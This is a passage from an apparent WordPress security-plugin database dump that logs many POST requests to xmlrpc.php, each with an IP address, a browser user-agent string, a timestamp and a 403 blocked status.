Firefox\\/1.0.6\"}','9wMFBPu2148pmRia6sSN3ny5',0,1681545827.9625,594,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','lI2WHDmpouhexPK8J7RQzXtF',0,1681545837.0629,1049,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Jgq45wse2TDWylPEbCzHxRdZ',0,1681545838.7520,635,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','ANF4bJHLGWwsYTfzaq9KnjZ5',0,1681545847.9283,572,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hKDQjTVGi6kcNI3m2XHzdYO0',0,1681547561.2853,4913,'','POST',403,0,515,0,1,'',0),('213.152.161.30',3583549726,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uVskErypavw0861P9U5Zd3H4',0,1681548053.5810,4184,'','POST',403,0,515,0,1,'',0),('178.162.212.214',2997015766,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hfdJ19I72mEbuFtkzZlgTHcv',0,1681548095.4073,615,'','POST',403,0,515,0,1,'',0),('64.42.179.43',1076540203,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','edrGRbV2hfLHvAKpuYBomgUt',0,1681549004.0749,736,'','POST',403,0,515,0,1,'',0),('178.238.229.54',3002000694,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nXy3JSwjx7MCW2aAzYvZkb6m',0,1681549434.5626,739,'','POST',403,0,515,0,1,'',0),('176.9.208.67',2953433155,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','7dYoAnxmMzJpE2jNQ4WeRIt8',0,1681549663.0048,3612,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','X34G5NAPz6phFZuRTJ2oYQjw',0,1681549671.2033,613,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','NQe1qVHiv2lfbD0ZISOjdLBu',0,1681549672.1915,682,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','uXVsYznq6eRcL0fGUlpd4gy5',0,1681549678.4516,1688,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','lip0afoC9mVZ2YkHcAQXbuB1',0,1681549678.6565,1801,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ledzCuq2WLR71xvoAP80hE95',0,1681549687.3757,625,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','HN5BFtAzCMfbV6mspUZXj0ho',0,1681549690.9063,619,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','b0C9eVgG4OIJXnzxd58pMNL2',0,1681549692.3956,574,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0CDt7zO8UheVk6KEiHWqP2XF',0,1681549698.2034,669,'','POST',403,0,515,0,1,'',0),('142.132.251.120',2391079800,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','Q1bUY3FXoiwG9h47L0BAtRpM',0,1681549701.8354,625,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','a1chmMkJfIHgT57zCx8dl0SX',0,1681549922.1430,3934,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','eJa6x0pUkArKcGihIg5woDZQ',0,1681549925.1482,1496,'','POST',403,0,515,0,1,'',0),('77.220.104.89',1306290265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','e6BfFqNPDdj4Oho1KEuWZl2n',0,1681549934.1553,619,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','uXF8HZbMGQEwPrgNimlSye0x',0,1681549934.9484,553,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','7YeJ4mbwZAPSVIFvtEXdy0Dz',0,1681549942.7524,1327,'','POST',403,0,515,0,1,'',0),('100.26.105.1',1679452417,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','1FSjRCWcJtzTZsXn8wlhxd6r',0,1681549942.7520,1412,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','pqk8lrKnUoeXVPcm7GRvECZt',0,1681549950.4762,627,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','akD1iZlsVX6h5TLbcS9OyGQI',0,1681549953.6579,592,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','aGsAYw0z7pRenuLQJ8gCIfT9',0,1681549954.8696,572,'','POST',403,0,515,0,1,'',0),('60.205.227.183',1020126135,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','x71Mwb4As3UhNFHvX9eSGuTm',0,1681549961.3611,586,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','pAZQycTD9XNl2skLfK1GVeHa',0,1681549977.1425,674,'','POST',403,0,515,0,1,'',0),('146.70.61.131',2454076803,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ov49DPsUqIE7Rdaw0n5uMYeO',0,1681550047.6163,657,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','jtDC4eXWYgIFvMm6SZBfbGay',0,1681554232.1494,761,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','pR0McGQ54TFaOCksZWoBq38f',0,1681554233.6949,587,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','SZc1ih6Y3CUNmL48GwvXp5Pu',0,1681554237.0776,593,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','7MTXDqoW2uBpCyeUHYQkdNjm',0,1681554245.1710,616,'','POST',403,0,515,0,1,'',0),('200.63.100.19',3359597587,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','VKmrNMgpj1bkF8TBHhzqZcd0',0,1681554246.8449,643,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','5Je2Dg79l4oHFmjKNc8EStxR',0,1681554259.4309,1050,'','POST',403,0,515,0,1,'',0),('176.31.124.90',2954853466,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','b7KsCN9EayBWwG6AYiuk2VDv',0,1681554259.8549,967,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ZsqR9HKXgaCtPnU5pBbF37YG',0,1681554271.9209,561,'','POST',403,0,515,0,1,'',0),('213.152.161.234',3583549930,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4faIU3YHbZnLj0C5M9vwGlTu',0,1681555316.8973,803,'','POST',403,0,515,0,1,'',0),('62.102.148.189',1046910141,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mNYkAOHhev67ETc2IBufF0qn',0,1681555978.1607,715,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','8I3Bo6bvAm0EjXecVpL5yG7W',0,1681558505.5181,1766,'','POST',403,0,515,0,1,'',0),('125.227.111.133',2112057221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','5OKfgwrxiAlJzGUd3FC0WEBP',0,1681558504.1682,3733,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','F1HliUpx9gIBdwOjPrqvT04a',0,1681558514.1323,605,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','Otk9RCmQ6U7H80LadnDyfJ1u',0,1681558516.7842,576,'','POST',403,0,515,0,1,'',0),('213.152.187.210',3583556562,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OgWA1aj3xERNYlspoIu9z42n',0,1681558521.7278,1056,'','POST',403,0,515,0,1,'',0),('80.244.168.40',1358211112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','VU5K6IcwrkpsSYRPfx3l2jDb',0,1681558522.1684,1025,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','NdV6FuLRjCiZhKXpM1v2cWw7',0,1681558527.2535,1033,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','mVkvlDEXiB6zeuMwPa2ZKSpA',0,1681558527.7668,1047,'','POST',403,0,515,0,1,'',0),('5.134.4.248',92669176,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','o8uni4tqdsSN2UbMkhVrH0xY',0,1681558544.2061,591,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','jSt5idRxGpHB2rbowzVc0hPu',0,1681558551.2678,576,'','POST',403,0,515,0,1,'',0),('193.200.99.82',3251135314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','8t2WIw3sKkx5OlAzm6LqZfUr',0,1681558552.1045,573,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','OT7fRHYxLSu5to3z9IEQkPAX',0,1681559035.1926,3559,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','fhnqIW56NlukRJTXzPm79BLe',0,1681559045.5215,698,'','POST',403,0,515,0,1,'',0),('107.190.132.194',1807647938,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','JMqwFW8b2sTBh6m4ACPpXvUc',0,1681559059.2110,593,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','Tr8igqYo0pZwhWlVUJey9vna',0,1681559061.3420,591,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','nZojUm8ALIOXepGCJdckbsw1',0,1681559069.4016,662,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','lVPmqzCXpeRGot2sNSEZ8irf',0,1681559089.4542,1358,'','POST',403,0,515,0,1,'',0),('217.138.252.123',3649764475,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','S2e5yl3sdrEPRVxZzjkFYDtm',0,1681560011.2810,3644,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','fltcBj312VLQJIgZ0PqxEFRW',0,1681562273.4706,947,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','xAFbMa9UHD02IpfWXnyOlvBg',0,1681562274.9091,639,'','POST',403,0,515,0,1,'',0),('103.148.15.211',1737756627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','3qfVD7nvhXKsUxepIcEAgFjd',0,1681562275.7459,578,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','vPETSKodftQaZkOrcz24gw1b',0,1681562281.8516,638,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','huydzQFS8q1IjeK2Tt3of76a',0,1681562295.3160,579,'','POST',403,0,515,0,1,'',0),('107.6.142.143',1795591823,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','C62vtXDQ5lYHO8xPeKrzknAf',0,1681562296.6491,595,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','lfsIATdSwcbmjNztB7ir6Vy9',0,1681562304.4081,1245,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','2ETOUZqwb3KjtN8CPgYMXyGJ',0,1681562304.6838,1247,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','nFXgQGBWfA6KMNPxwtEbDZLq',0,1681562309.6162,572,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','QAKYSaU8LGcNMPFfyBeO4gDx',0,1681562329.2413,640,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','U42vVY9jAlxuOezTc7BahE8L',0,1681562798.6277,2148,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','E8Ne3QajIAMi2TUcD7FGkBC4',0,1681562797.1112,3946,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','KfMoNPl7Vin2qDuezbd9cgh8',0,1681562799.4472,1930,'','POST',403,0,515,0,1,'',0),('200.58.110.158',3359272606,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','1yQ974xiPqbXYGr0ZOaAKBVg',0,1681562808.1157,567,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','XLeN1g5jy9owltqfxK4vBbnh',0,1681562810.2332,572,'','POST',403,0,515,0,1,'',0),('45.150.149.86',764843350,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','QOZxDf4JTjcnbm6d31tlwBv8',0,1681562822.9157,554,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','1xsg2bhftDa6AG4FeLX5zoIR',0,1681562824.2324,569,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','nRf0Lj1WKztv9P7XCJ2QwBHD',0,1681562826.0698,559,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','L6kpxmoQzlPvqf73B4nM1W0D',0,1681562831.8603,639,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','yp4IuwDxFBCZVjSrtOmn89q2',0,1681562837.5468,551,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','YAWo3Lyp2vOTNK0BRVj8rfCt',0,1681562842.9428,591,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','uhVwfpj0XMAKCR69qt7y2SgZ',0,1681562851.4637,709,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 